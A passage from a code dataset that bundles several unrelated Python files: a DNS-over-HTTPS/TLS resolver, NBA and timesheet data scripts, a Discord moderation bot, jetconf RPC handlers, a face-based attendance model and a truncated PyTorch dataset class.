validate_dnssec(self, question_name, outbound, protocol):\n request = dns.message.make_query(question_name + '.', dns.rdatatype.DNSKEY, want_dnssec=True)\n response = self.protocol_methods[protocol].__call__(request, outbound)\n if response.rcode() != 0:\n return True\n\n name = dns.name.from_text(question_name + '.')\n answer = response.answer\n dns.dnssec.validate(answer[0], answer[1], {name: answer[0]})\n\n def handle_response(self, response):\n if not response:\n 
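# no usable upstream answer (e.g. timeout or parse failure), so signal the caller to give up\n            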
return None\n if self.cache:\n for answer in response.answer:\n self.cache.put(answer)\n return response.to_wire()\n\n def firewall_clearance(self, wire_message, client_ip):\n try:\n dns_message = dns.message.from_wire(wire_message)\n if client_ip in self.firewall['client_blacklist']:\n return False\n\n if self.firewall['rate_limit'] > -1:\n self.rate_per_second[0] += 1\n if int(time.time()) - self.rate_per_second[1] >= 1:\n self.rate_per_second = [0, int(time.time())]\n if self.firewall['rate_limit'] <= self.rate_per_second[0]:\n return False\n\n if self.firewall['refuse_ANY']:\n for q in dns_message.question:\n if q.rdtype == dns.rdatatype.ANY:\n return False\n\n if self.firewall['AAAA_disabled']:\n for q in dns_message.question:\n if q.rdtype == dns.rdatatype.AAAA:\n return False\n return True\n except Exception as exc:\n print(\"[Error]:\", exc)\n\n def wire_resolve(self, wire_message):\n \"\"\"Parse wire messages received by inbounds and forward them to corresponding outbounds.\n\n :param wire_message: DNS query message received by inbound.\n :return: DNS response to the query.\n \"\"\"\n \n try:\n dns_message = dns.message.from_wire(wire_message)\n message_flags = dns.flags.to_text(dns_message.flags)\n\n # raise an exception since 'wire_resolve' method should only process dns queries\n if 'QR' in message_flags:\n raise TypeError(\"DNS Resolver should only receive queries\")\n\n # retrieve cached rrset from cache\n question_rrset = dns_message.question[0]\n question_name = question_rrset.name.to_text().rstrip('.')\n if self.cache:\n cached_response_rrset, ttl = self.cache.get(question_rrset)\n if cached_response_rrset:\n dns_response = dns.message.make_response(dns_message)\n dns_response.answer.append(cached_response_rrset)\n return dns_response.to_wire()\n\n # check hosts\n hosts_record = encrypted_dns.utils.parse_domain_rules(self.hosts, question_name)\n if hosts_record:\n dns_response = dns.message.make_response(dns_message)\n if encrypted_dns.utils.is_valid_ipv4_address(hosts_record):\n hosts_rrset = dns.rrset.from_text(question_rrset.name, 300, dns.rdataclass.IN,\n dns.rdatatype.A, hosts_record)\n else:\n if not hosts_record.endswith('.'):\n hosts_record += '.'\n\n hosts_rrset = dns.rrset.from_text(question_rrset.name, 300, dns.rdataclass.IN,\n dns.rdatatype.CNAME, hosts_record)\n dns_response.answer.append(hosts_rrset)\n return dns_response.to_wire()\n\n # add ecs to query message\n self.edns_subnet_client(dns_message, self.ecs_ip_address)\n\n # list of outbounds in config.json\n outbound_group, is_concurrent = OutboundHandler.get_group(question_name, self.domain_group, self.tag_group)\n proxy = outbound_group.get('proxies', None)\n if is_concurrent:\n executor = concurrent.futures.ThreadPoolExecutor(max_workers=10)\n result_pool = []\n for outbound in outbound_group['dns']:\n result_pool.append(executor.submit(self._resolve_thread, outbound, dns_message, question_name, proxy))\n \n first = concurrent.futures.wait(result_pool, timeout=60, return_when=concurrent.futures.FIRST_COMPLETED)\n dns_response = next(iter(first[0])).result()\n executor.shutdown()\n else:\n outbound = OutboundHandler.random_outbound(outbound_group)\n dns_response = self._resolve_thread(outbound, dns_message, question_name, proxy)\n\n return self.handle_response(dns_response)\n\n except dns.message.ShortHeader:\n print('[Error]: The DNS packet passed to from_wire() is too short')\n except dns.message.TrailingJunk:\n print('[Error]:The DNS packet passed to from_wire() has extra junk at the end of it')\n 
except dns.message.UnknownHeaderField:\n print('[Error]: The header field name was not recognized when converting from text into a message')\n except dns.message.BadEDNS:\n print('[Error]: An OPT record occurred somewhere other than the start of the additional data section')\n except dns.message.UnknownTSIGKey:\n print('[Error]: A TSIG with an unknown key was received')\n except dns.message.BadTSIG:\n print('[Error]: A TSIG record occurred somewhere other than the end of the additional data section')\n except dns.name.BadLabelType:\n print('[Error]: The label type in DNS name wire format is unknown')\n except dns.exception.Timeout:\n print('[Error]: The DNS operation timed out')\n except Exception as exc:\n print('[Error]:', exc)\n\n def _resolve_thread(self, outbound, dns_message, question_name, proxy):\n try:\n protocol, dns_address, port = encrypted_dns.utils.parse_dns_address(outbound)\n is_valid_ip_address = encrypted_dns.utils.is_valid_ipv4_address(dns_address)\n\n if protocol in ('https', 'tls', 'doh', 'dot') and not is_valid_ip_address:\n if 'bootstrap' in self.tag_group:\n bootstrap_dns_ip = self.tag_group['bootstrap']['dns'][0]\n else:\n bootstrap_dns_ip = '1.0.0.1'\n\n ip_address = OutboundHandler.resolve_outbound_ip(dns_address, bootstrap_dns_ip, self.hosts)\n outbound = {\n 'protocol': protocol,\n 'domain': dns_address,\n 'ip': ip_address,\n 'port': port,\n 'proxy': proxy\n }\n else:\n outbound = {\n 'protocol': protocol,\n 'ip': dns_address,\n 'port': port\n }\n\n dns_response = self.protocol_methods[protocol].__call__(dns_message, outbound)\n if self.dnssec and not self.validate_dnssec(question_name, outbound, protocol):\n return None\n return dns_response\n except Exception:\n raise\n\n @staticmethod\n def _udp_resolve(dns_message, outbound):\n udp = encrypted_dns.outbound.DatagramOutbound.from_dict(outbound)\n return udp.query(dns_message)\n\n @staticmethod\n def _tcp_resolve(dns_message, outbound):\n tcp = encrypted_dns.outbound.StreamOutbound.from_dict(outbound)\n return tcp.query(dns_message)\n\n @staticmethod\n def _https_resolve(dns_message, outbound):\n https = encrypted_dns.outbound.HTTPSOutbound.from_dict(outbound)\n return https.query(dns_message)\n\n @staticmethod\n def _tls_resolve(dns_message, outbound):\n tls = encrypted_dns.outbound.TLSOutbound.from_dict(outbound)\n return tls.query(dns_message)\n","repo_name":"dkdrcom5-gmail-com/Encrypted-DNS","sub_path":"encrypted_dns/resolve/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":11187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"341599721","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 19 11:41:14 2021\n\n@author: jstei\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\n\ndef unique(list1):\n x=np.array(list1)\n return np.unique(x)\n\nDF=pd.read_csv('RawDF.csv')\nlabels=['Unnamed: 0','Unnamed: 0.1','jersey_number','reference']\nDF=DF.drop(labels, axis=1)\nDF.year=DF.year.astype('object')\nDF['team_changes']=0\nduplicates=[]\ndrop_index_values=[]\nfor a in range(len(DF)):\n name=DF.loc[a,'combined']\n values=DF[DF.combined==name].index.values\n values=[i for i in values]\n if len(values)>1:\n duplicates.append(name)\n drop_index_values.append(values)\n\nduplicates=unique(duplicates)\ndrop_index_values=[i for sublist in drop_index_values for i in sublist]\ndrop_index_values=unique(drop_index_values)\nkeys=[i for i in 
DF.columns]\ncolumns=dict.fromkeys(keys)\ndataframes=[]\nsum_columns=['games_played','games_started','offensive_rebounds','defensive_rebounds','tech_fouls','ejections','foulouts','double_doubles','triple_doubles']\nfor i in duplicates:\n data=[]\n values=DF[DF.combined==i].index.values\n values=[i for i in values]\n for column in columns:\n point=[]\n for value in values:\n point.append(DF.loc[value,column])\n if column==\"games_played\":\n weights=[]\n for i in range(len(point)):\n weights.append(point[i]/sum(point))\n data.append(sum(point))\n elif column=='team_changes':\n data.append(len(values))\n elif any(i==column for i in sum_columns):\n data.append(sum(point))\n else:\n if DF[column].dtype=='O':\n data.append(DF.loc[values[0],column])\n else:\n product=[]\n for num1,num2 in zip(weights,point):\n product.append(num1*num2)\n data.append(sum(product))\n result=dict(zip(columns,data))\n individualDF=pd.DataFrame(result,index=[0])\n dataframes.append(individualDF)\n\nDuplicateDF=pd.concat(dataframes,axis=0)\n\nDF=DF.drop(drop_index_values,axis=0)\nDuplicate_Free_DF=pd.concat([DF,DuplicateDF],axis=0)\nDF.year=DF.year.astype('int64')\nDuplicate_Free_DF.year=Duplicate_Free_DF.year.astype('int64')\nDuplicate_Free_DF.sort_values(by=['year'])\n\nDuplicateDF.to_csv('DuplicateDF.csv',index=None)\nDuplicate_Free_DF.to_csv('Duplicate_Free_DF.csv',index=None)\n \n\n\n\n\n\n\n\n# for a in range(len(DF)):\n# name=DF.loc[a,'id']\n# year=DF.loc[a,'year']\n# values=DF[DF.id==name].index.values\n# values=[i for i in values]\n# for i in values:\n# if DF.loc[i,'year']\n# if len(values)>1:\n# for i in range(len(values)-1):\n# if DF.loc[i,'year']==DF.loc[(i+1),'year']:\n# try:\n# values.pop(i)\n# except:\n# pass\n# if len(values)>1:\n# if DF.loc[values[0],'experience']!=DF.loc[values[1],'experience']:\n# continue\n# else:\n# for i in range(len(values)):\n# DF.loc[values[i],'experience']=float(DF.loc[a,'experience'])-i","repo_name":"jsteinfink914/Projects","sub_path":"NBA Salary Prediction/Data Cleaning/Experience_and_duplicates.py","file_name":"Experience_and_duplicates.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21063826328","text":"#!/usr/bin/env python3\nimport openpyxl\nfrom openpyxl.utils import cell, get_column_letter, column_index_from_string\nimport os\nimport glob\nfrom os import listdir\nfrom os.path import isfile, join\nimport pprint\n\nprint(f\"-- testing openpyxl version {openpyxl.__version__}\")\n\n# sheets_dir = 'sheets'\n# onlyfiles = [f for f in listdir('sheets') if isfile(join(mypath, f))]\n\nscript_path = os.path.realpath(__file__)\nscript_dir = os.path.dirname(script_path)\nxls_dir = os.path.join(script_dir, \"2022\")\n\n# every file that ends with '.xlsx' under \"sheets\" dir\n# https://stackoverflow.com/questions/18394147/how-to-do-a-recursive-sub-folder-search-and-return-files-in-a-list\nfiles = glob.glob(xls_dir + '/**/*.xlsx', recursive=True)\n\nentries = [\"S&O - AGV\", \"EVBS\", \"PIDXRAY\", \"R&D\", \"Overhead\", \"Public holiday\", \"Vacation (Holiday)\"]\ntotal1 = {}\nfor e in entries:\n print(e)\n total1[e] = 0\n\nprint(total1)\n\n# total = 0 # create dictionary for each entry\ndd = {}\n\nfor f in files:\n try:\n print(f)\n wb = openpyxl.load_workbook(f)\n sheet = wb[wb.sheetnames[0]]\n \n # print(sheet.min_row, sheet.max_row, sheet.min_column, sheet.max_column)\n # print(get_column_letter(sheet.min_column), get_column_letter(sheet.max_column)) \n field_start = 
get_column_letter(sheet.min_column) + str(sheet.min_row)\n        field_end = get_column_letter(sheet.max_column) + str(sheet.max_row)\n        # print(field_start, '--', field_end)\n        # print(sheet['P1'].value)\n\n        week_nr = None\n        week_total = 0\n\n        for rowOfCellObjects in sheet[field_start:field_end]:\n            for cellObj in rowOfCellObjects:\n                if cellObj.value is not None:\n                    for entry in entries:\n                        if cellObj.value == entry:\n                            coord_curr = cellObj.coordinate\n                            coord_next = coord_curr.replace(get_column_letter(cellObj.col_idx), get_column_letter(cellObj.col_idx+1))\n                            # print(coord_curr, coord_next, sheet[coord_next].value)\n                            # total += sheet[coord_next].value\n                            total1[entry] += sheet[coord_next].value\n                            week_total += sheet[coord_next].value\n                        elif str(cellObj.value).startswith(\"weeknr:\"):\n                            week_nr = [int(s) for s in str(cellObj.value).split() if s.isdigit()]\n                            week_nr = week_nr[0]\n\n        print(f\"Week {week_nr}: {week_total}\")\n        # dd[\"week\"+str(week_nr)] = week_total\n        dd[week_nr] = week_total\n        \n        # for row in range(sheet.max_row):\n        #     for col in range(sheet.max_column):\n        #         val = \n\n\n        \n    except Exception as e:\n        print(\"-----\")\n        print(f)\n        print(\"Error: \", e)\n        print(\"######\")\n\npprint.pprint(dd)\n# print(f\"Total:{total}\")\nprint(total1)\n","repo_name":"miroslavradojevic/python-snippets","sub_path":"excel/sheets.py","file_name":"sheets.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"30144981276","text":"from oop1 import BankAccount\r\ndef main():\r\n    start_bal = float(input(\"Enter your starting balance: \"))\r\n    # create the BankAccount object\r\n    savings = BankAccount(start_bal)\r\n    # deposit money\r\n    pay = float(input(\"Enter the amount to deposit into the account: \"))\r\n    savings.deposit(pay)\r\n    ###\r\n    cash = float(input(\"Enter the amount to withdraw from the account: \"))\r\n    savings.withdraw(cash)\r\n    ###\r\n    print(\"The remaining balance in your account is: \", savings.get_balance())\r\n\r\nmain()\r\n\r\n","repo_name":"tradaviahe1982/Python_Basic_For_EveryOne","sub_path":"oop1_test.py","file_name":"oop1_test.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"17723739494","text":"from inspect import EndOfBlock\r\nimport os\r\nimport discord\r\nfrom discord import member\r\nfrom discord import message\r\nfrom discord import embeds\r\nfrom discord import guild\r\nfrom discord import user\r\nfrom discord import client\r\nfrom discord.colour import Color\r\nfrom discord.enums import Status\r\nimport discord.ext.commands as commands\r\nfrom discord.ext.commands.core import has_permissions\r\nimport dotenv\r\nimport json\r\n\r\nintents = discord.Intents.default()\r\nintents.members = True\r\ndotenv.load_dotenv()\r\n\r\nbot = commands.Bot(command_prefix='!', intents=intents, help_command=None)\r\n\r\n\r\ndef read_blacklisted_words(filename='blacklistedWords.json'):\r\n    data = []\r\n    with open(filename, 'r') as f:\r\n        data = json.loads(f.read()).get(\"blacklistedWords\", [])\r\n    return data\r\n\r\n\r\ndef write_json(data, filename=\"blacklistedWords.json\"):\r\n    with open(filename, \"w\") as f:\r\n        json.dump(data, f, indent=4)\r\n\r\n\r\n@bot.event\r\nasync def on_ready():\r\n\r\n    await bot.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name=\"servers as moderator\"))\r\n\r\n    print(\"I am Online\")\r\n    
print(\"-----------------\")\r\n\r\n\r\n@bot.event\r\nasync def on_member_join(member):\r\n await member.send(f\"Welcome to the server {member.mention}\")\r\n\r\n\r\n@bot.command(aliases=['c'])\r\n@commands.has_permissions(manage_messages=True)\r\nasync def clear(ctx, amount=2):\r\n await ctx.channel.purge(limit=amount+1)\r\n\r\n\r\n@bot.command(aliases=['k'])\r\n@commands.has_permissions(kick_members=True)\r\nasync def kick(ctx, member: discord.Member, *, reason=\"No reason provided\"):\r\n if member == None or member == ctx.message.author:\r\n await ctx.channel.send(\"You cannot kick yourself\")\r\n return\r\n if member.top_role > ctx.author.top_role: # Check if the role is below the authors role\r\n await ctx.send(\"You can only kick users with a lower role!\")\r\n return\r\n await member.send(f\"You have been kicked from our Server {ctx.message.guild}, because of \"+reason)\r\n await ctx.send(f\"{member.mention} has been kicked from the server {ctx.guild.name}, Reason:\"+reason)\r\n await member.kick(reason=reason)\r\n\r\n\r\n@bot.command(aliases=['b'])\r\n@commands.has_permissions(ban_members=True)\r\nasync def ban(ctx, member: discord.Member, *, reason=\"No reason provided\"):\r\n if member == None or member == ctx.message.author:\r\n await ctx.channel.send(\"You cannot ban yourself\")\r\n return\r\n if member.top_role > ctx.author.top_role: # Check if the role is below the authors role\r\n await ctx.send(\"You can only ban users with a lower role!\")\r\n return\r\n await member.send(f\"You have been banned from our Server {ctx.guild.name}, because of \"+reason)\r\n embed = discord.Embed(\r\n title=\"User Banned!\", description=f\"{member.mention} has been banned from the server {ctx.guild.name}, because of \"+reason)\r\n # await ctx.send(f\"{member.mention} has been banned from the server {ctx.guild.name}, because of \"+reason)\r\n await ctx.send(embed=embed)\r\n await member.ban(reason=reason)\r\n\r\n\r\n@bot.command(aliases=['ub'])\r\n@commands.has_permissions(ban_members=True)\r\nasync def unban(ctx, *, member):\r\n banned_users = await ctx.guild.bans()\r\n member_name, member_disc = member.split('#')\r\n\r\n for banned_entry in banned_users:\r\n user = banned_entry.user\r\n\r\n if(user.name, user.discriminator) == (member_name, member_disc):\r\n await ctx.guild.unban(user)\r\n # await ctx.send(member_name+\" has been unbanned!\")\r\n embed = discord.Embed(title=\"User Unbanned!\",\r\n description=member_name+\" has been unbanned!\")\r\n await ctx.send(embed=embed)\r\n return\r\n\r\n embed = discord.Embed(title=\"User Not Found\",\r\n description=f\"{member} was not found\")\r\n await ctx.send(embed=embed)\r\n # await ctx.send(member+\" was not found\")\r\n\r\n\r\n@bot.command(aliases=['m'])\r\n@commands.has_permissions(kick_members=True)\r\nasync def mute(ctx, member: discord.Member):\r\n if member == None or member == ctx.message.author:\r\n await ctx.channel.send(\"You cannot mute or unmute yourself\")\r\n return\r\n if member.top_role > ctx.author.top_role:\r\n await ctx.send(\"You can only mute users with a lower role!\")\r\n return\r\n muted_role = ctx.guild.get_role(900024798585954325)\r\n\r\n await member.add_roles(muted_role)\r\n embed = discord.Embed(title=\"User Muted!\",\r\n description=f\"{member.mention} has been muted\")\r\n await ctx.send(embed=embed)\r\n # await ctx.send(member.mention + \" has been muted\")\r\n\r\n\r\n@bot.command(aliases=['um'])\r\n@commands.has_permissions(kick_members=True)\r\nasync def unmute(ctx, member: discord.Member):\r\n if member == 
None or member == ctx.message.author:\r\n await ctx.channel.send(\"You cannot mute or unmute yourself\")\r\n return\r\n muted_role = ctx.guild.get_role(900024798585954325)\r\n\r\n await member.remove_roles(muted_role)\r\n embed = discord.Embed(title=\"User Unmuted!\",\r\n description=f\"{member.mention} has been unmuted\")\r\n await ctx.send(embed=embed)\r\n # await ctx.send(member.mention + \" has been unmuted\")\r\n\r\n\r\n@bot.event\r\nasync def on_message(message):\r\n for word in read_blacklisted_words():\r\n if word in message.content:\r\n await message.delete()\r\n embed = discord.Embed(\r\n title=\"Warning!\", description=f\"Warning!! {message.author.mention} you're using blacklisted Words!!\")\r\n # await message.channel.send(f\"Warning!! {message.author} you're using blacklisted Words!!\")\r\n await message.channel.send(embed=embed)\r\n\r\n if str(message.channel) == \"images-only\" and message.content != \"\":\r\n await message.channel.purge(limit=1)\r\n\r\n await bot.process_commands(message)\r\n\r\n\r\n@bot.event\r\nasync def on_command_error(ctx, error):\r\n if isinstance(error, commands.MissingPermissions):\r\n await ctx.send(\"I'm gonna pretend you didn't say that because you're not a moderator ;-;\")\r\n elif isinstance(error, commands.MissingRequiredArgument):\r\n await ctx.send(\"You have not entered all the required arguments\")\r\n else:\r\n print(error)\r\n\r\n\r\n@bot.command(aliases=['info'])\r\n@commands.has_permissions(kick_members=True)\r\nasync def user(ctx, member: discord.Member):\r\n embed = discord.Embed(\r\n title=member.name, description=member.mention, color=discord.Colour.red())\r\n embed.add_field(name=\"ID\", value=member.id, inline=True)\r\n embed.set_thumbnail(url=member.avatar_url)\r\n embed.set_footer(icon_url=ctx.author.avatar_url,\r\n text=f\"Requested by {ctx.author.name}\")\r\n await ctx.send(embed=embed)\r\n\r\n\r\n@bot.command(aliases=['bl'])\r\n@commands.has_permissions(ban_members=True)\r\nasync def blacklist(ctx):\r\n blacklisted_words = read_blacklisted_words()\r\n embed = discord.Embed(title=\"Black Listed Words\",\r\n description=', '.join(blacklisted_words), color=discord.Colour.red())\r\n await ctx.channel.send(embed=embed)\r\n\r\n\r\n@bot.command(aliases=['atb'])\r\n@commands.has_permissions(ban_members=True)\r\nasync def addtoblacklist(ctx, *, word):\r\n with open(\"blacklistedWords.json\") as json_file:\r\n data = json.load(json_file)\r\n temp = data[\"blacklistedWords\"]\r\n temp.append(word)\r\n write_json(data)\r\n\r\n\r\n@bot.command(aliases=['h'])\r\nasync def help(ctx):\r\n embed = discord.Embed(title=f\"**Help Command**\", description=\"*Hi, I'm PikaBot. I'm here to help you in moderating this server. 
I'm developed by Soumyajoy Das aka <@!583523069167927296>*\\n\\n**!clear N or !c N:**\\t*Deletes N Messages*\\n\\n**!kick @user or !k @user:**\\t*Kick users from server*\\n\\n**!ban @user or !b @user:**\\t*Ban users from server*\\n\\n**!unban @user#id or !ub @user#id:**\\t*Unban banned users*\\n\\n**!mute or !m:**\\t*Mutes users by adding a mute role*\\n\\n**!umute or !um:**\\t*Unmutes users by removing mute role*\\n\\n**!user or !info:**\\t*Gives user info*\\n\\n**!blacklist or !bl:**\\t*Displays Blacklisted Words*\\n\\n**!addtoblacklist str or !atb str:**\\t*Add words to blacklist*\\n\\n\\n**NOTE:**\\t**These Commands can only be used by server Moderators**\", color=discord.Colour.from_rgb(245, 158, 11))\r\n embed.set_footer(icon_url=ctx.author.avatar_url,\r\n text=f\"Help command requested by {ctx.author.name}\")\r\n await ctx.send(embed=embed)\r\n\r\n\r\n\r\nbot.run(os.getenv('TOKEN'))\r\n","repo_name":"soumyajoydas01/moderation-bot","sub_path":"mod.py","file_name":"mod.py","file_ext":"py","file_size_in_byte":8456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70494205992","text":"from colorlog import info, warning, error, debug\nfrom os import urandom\nfrom base64 import b32encode\n\nfrom yangson.instance import InstanceRoute\nfrom yangson.exceptions import NonexistentInstance\n\nfrom jetconf.helpers import JsonNodeT, PathFormat\nfrom jetconf.data import BaseDatastore\nfrom .assignments import assigned\n\nclass OpHandlersContainer:\n def __init__(self, ds: BaseDatastore):\n self.ds = ds\n\n def establish_subscription_op(self, input_args: JsonNodeT, username: str) -> JsonNodeT:\n info(f'called establish_subscription: {input_args}')\n return {'id':2}\n\n def refresh_watcher_id_op(self, input_args: JsonNodeT, username: str) -> JsonNodeT:\n watch_id = input_args.get('watcher-id')\n info(f'called refresh-watcher-id: {watch_id}')\n debug(f' (from input args: {input_args})')\n assigned.check_timeouts()\n\n if not watch_id:\n raise ValueError(f'Could not extract watcher-id from {input_args}')\n w = assigned.watchers.get(watch_id)\n if not w:\n raise ValueError(f'Found no watcher-id {watch_id}')\n w.refresh()\n\n def get_new_watcher_id_op(self, input_args: JsonNodeT, username: str) -> JsonNodeT:\n info(f'called get-new-watcher-id: {input_args}')\n watcher_id = b32encode(urandom(10)).decode('utf-8')\n assigned.create_watcher(watcher_id)\n return {'watcher-id': watcher_id, 'refresh-period': 20}\n\ndef register_op_handlers(ds: BaseDatastore):\n op_handlers_obj = OpHandlersContainer(ds)\n ds.handlers.op.register(op_handlers_obj.establish_subscription_op,\n \"ietf-subscribed-notifications:establish-subscription\")\n ds.handlers.op.register(op_handlers_obj.get_new_watcher_id_op,\n \"ietf-mnat:get-new-watcher-id\")\n ds.handlers.op.register(op_handlers_obj.refresh_watcher_id_op,\n \"ietf-mnat:refresh-watcher-id\")\n\n","repo_name":"GrumpyOldTroll/mnat","sub_path":"server/module/jetconf_mnat/usr_op_handlers.py","file_name":"usr_op_handlers.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"4480070476","text":"\"\"\"Module documentation for engagement_model.py\n This script contains the class EngageModel. 
Within this class there are several functions such as class_list().\n\"\"\"\n\nimport argparse\nimport cv2\nimport sys\nimport numpy as np\nimport os\nimport json\nimport csv\nfrom csv import writer\nfrom datetime import datetime\nimport sqlite3\nimport ast\n\n__author__ = \"Philip Baker & Keith Spencer-Edgar\"\n__date__ = \"25-10-2020\"\n\nclass EngageModel:\n    def __init__(self, args):\n        self.args = args\n        self.code = args.code\n        self.threshold = args.threshold\n\n    def class_list(self, detection_features, data, this_class_name, class_photo_name, qual, average_face_width):\n        \"\"\"\n        iterate through detected faces, comparing their features to those enrolled in the class\n\n        Parameters:\n        ----------\n        detection_features: ndarray(n,512)\n            features from tiny face detection\n        data: list \n            list of lists, first list upi, second list features for corresponding upi\n        this_class_name: string\n            name of class\n        class_photo_name: string\n            name of photo\n        qual: float\n            quality factor of photo\n        average_face_width: float\n            the average width of detection for photo\n        Returns :\n        ---------\n        roll: list\n            all data for each student in class\n\n        \"\"\"\n        roll = list()\n        for i in range(len(data[0])): # for each person supposed to be in the class\n            name = data[0][i]\n            match = False\n            j = 0\n            # go through all detections and compare to this person\n            while not match and j < np.shape(detection_features)[0]:\n                dist = np.sum(np.square(detection_features[j, :] - data[1][i][:]))\n                if dist < self.args.threshold:\n                    match = True\n                j += 1\n\n            if match:\n                roll.append(list([name, 1, this_class_name,\n                                  os.path.basename(os.path.normpath(class_photo_name)), qual, average_face_width]))\n            else:\n                roll.append(list([name, 0, this_class_name,\n                                  os.path.basename(os.path.normpath(class_photo_name)), qual, average_face_width]))\n\n        return roll\n\n    # calculate embeddings for each sample\n    def get_embeddings(model, class_faces):\n        \"\"\"\n        iterate through detected faces and calculate feature embeddings for each face\n\n        Parameters:\n        ----------\n        class_faces: list of lists, each list has an image (ndarray:(x,y,3)) and a score (float)\n            list of cropped detections with scores \n        Returns :\n        ---------\n        features: numpy array, (n, 512)\n            feature embeddings, one row per detected face\n        face_widths : list\n            list of face widths\n\n        \"\"\"\n\n        feat_len = len(class_faces)\n        features = np.zeros((feat_len, 512))\n        face_widths = list()\n        isface = False\n        i = 0\n        for img in class_faces:\n\n            try:\n                img2 = model.get_input(img[0])\n                f1 = model.get_feature(img2)\n                features[i, :] = f1\n                i += 1\n                isface = True\n            except Exception:\n                print('ArcFace could not detect face')\n                features = np.delete(features, i, 0)\n                isface = False\n\n            if isface:\n                face_widths.append(img[1])\n\n        return features, face_widths\n\n    def get_profiles(self):\n        \"\"\"\n        query feature embeddings for students in a specific class from the SQLite database\n        \n        \"\"\"\n        conn = sqlite3.connect('engage.db')\n        c = conn.cursor()\n        c.execute(\n            \"SELECT * FROM features INNER JOIN %s ON %s.upi = features.upi\" % (repr(self.code), repr(self.code)))\n        data = c.fetchall()\n        conn.commit()\n        conn.close()\n\n        return data\n\n    # compare samples to profile face embeddings\n    def compare_embeddings(self, sample_features, data):\n        \"\"\"\n        compares feature embeddings\n\n        Parameters:\n        ----------\n        sample_features : numpy array, (n, 512)\n            features from detections\n        data : list\n            upis and corresponding features\n\n        \"\"\"\n        conn = sqlite3.connect('engage.db')\n        c = conn.cursor()\n        date = str(datetime.date(datetime.now()))\n        for 
i in range(len(sorted(data))):\n count = 0\n j = 0\n while count == 0 and j < np.shape(sample_features)[0]:\n f1 = sample_features[j, :] # sample features\n f2 = np.array(ast.literal_eval(data[i][1])) # profile features\n f2 = f2.astype('float64')\n dist = np.sum(np.square(f1 - f2))\n name = data[i][0]\n if dist < self.args.threshold:\n count = 1\n c.execute(\n \"\"\"INSERT OR IGNORE INTO attendance VALUES (:date, :upi, :course_code, :attendance)\"\"\",\n {'date': date, 'upi': name, 'course_code': self.code, 'attendance': 1})\n j += 1\n if count == 0:\n name = data[i][0]\n c.execute(\"\"\"INSERT OR IGNORE INTO attendance VALUES (:date, :upi, :course_code, :attendance)\"\"\",\n {'date': date, 'upi': name, 'course_code': self.code, 'attendance': 0})\n conn.commit()\n conn.close()\n","repo_name":"philip-baker/engage","sub_path":"helper/engagement_model.py","file_name":"engagement_model.py","file_ext":"py","file_size_in_byte":5633,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"529264697","text":"import csv \nimport sys\nimport numpy as np\nfrom PIL import Image\n\nimport torch\nimport torch.nn as nn\nfrom torchvision import models\nfrom torchvision import transforms\nfrom torch.utils.data import Dataset, DataLoader\n\n# Utils\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\")\nprint(\"Device used: \", device)\n\nmean = [0.485, 0.456, 0.406]\nstd = [0.229, 0.224, 0.225]\n\nlabel2class = ['Alarm_Clock', 'Backpack', 'Batteries', 'Bed', 'Bike', 'Bottle', 'Bucket', 'Calculator', 'Calendar', 'Candles', 'Chair', 'Clipboards', 'Computer', 'Couch', 'Curtains', 'Desk_Lamp', 'Drill', 'Eraser', 'Exit_Sign', 'Fan', 'File_Cabinet', 'Flipflops', 'Flowers', 'Folder', 'Fork', 'Glasses', 'Hammer', 'Helmet', 'Kettle', 'Keyboard', 'Knives', 'Lamp_Shade', 'Laptop', 'Marker', 'Monitor', 'Mop', 'Mouse', 'Mug', 'Notebook', 'Oven', 'Pan', 'Paper_Clip', 'Pen', 'Pencil', 'Postit_Notes', 'Printer', 'Push_Pin', 'Radio', 'Refrigerator', 'Ruler', 'Scissors', 'Screwdriver', 'Shelf', 'Sink', 'Sneakers', 'Soda', 'Speaker', 'Spoon', 'TV', 'Table', 'Telephone', 'ToothBrush', 'Toys', 'Trash_Can', 'Webcam']\nclass2label = {'Alarm_Clock': 0, 'Backpack': 1, 'Batteries': 2, 'Bed': 3, 'Bike': 4, 'Bottle': 5, 'Bucket': 6, 'Calculator': 7, 'Calendar': 8, 'Candles': 9, 'Chair': 10, 'Clipboards': 11, 'Computer': 12, 'Couch': 13, 'Curtains': 14, 'Desk_Lamp': 15, 'Drill': 16, 'Eraser': 17, 'Exit_Sign': 18, 'Fan': 19, 'File_Cabinet': 20, 'Flipflops': 21, 'Flowers': 22, 'Folder': 23, 'Fork': 24, 'Glasses': 25, 'Hammer': 26, 'Helmet': 27, 'Kettle': 28, 'Keyboard': 29, 'Knives': 30, 'Lamp_Shade': 31, 'Laptop': 32, 'Marker': 33, 'Monitor': 34, 'Mop': 35, 'Mouse': 36, 'Mug': 37, 'Notebook': 38, 'Oven': 39, 'Pan': 40, 'Paper_Clip': 41, 'Pen': 42, 'Pencil': 43, 'Postit_Notes': 44, 'Printer': 45, 'Push_Pin': 46, 'Radio': 47, 'Refrigerator': 48, 'Ruler': 49, 'Scissors': 50, 'Screwdriver': 51, 'Shelf': 52, 'Sink': 53, 'Sneakers': 54, 'Soda': 55, 'Speaker': 56, 'Spoon': 57, 'TV': 58, 'Table': 59, 'Telephone': 60, 'ToothBrush': 61, 'Toys': 62, 'Trash_Can': 63, 'Webcam': 64}\n\n# Custom Dataset & DataLoader\nclass HW4P2ATest(Dataset):\n def __init__(self, dirpath, csvpath, transform=None):\n self.dirpath = dirpath\n self.filenames = []\n with open(csvpath) as f:\n csvreader = 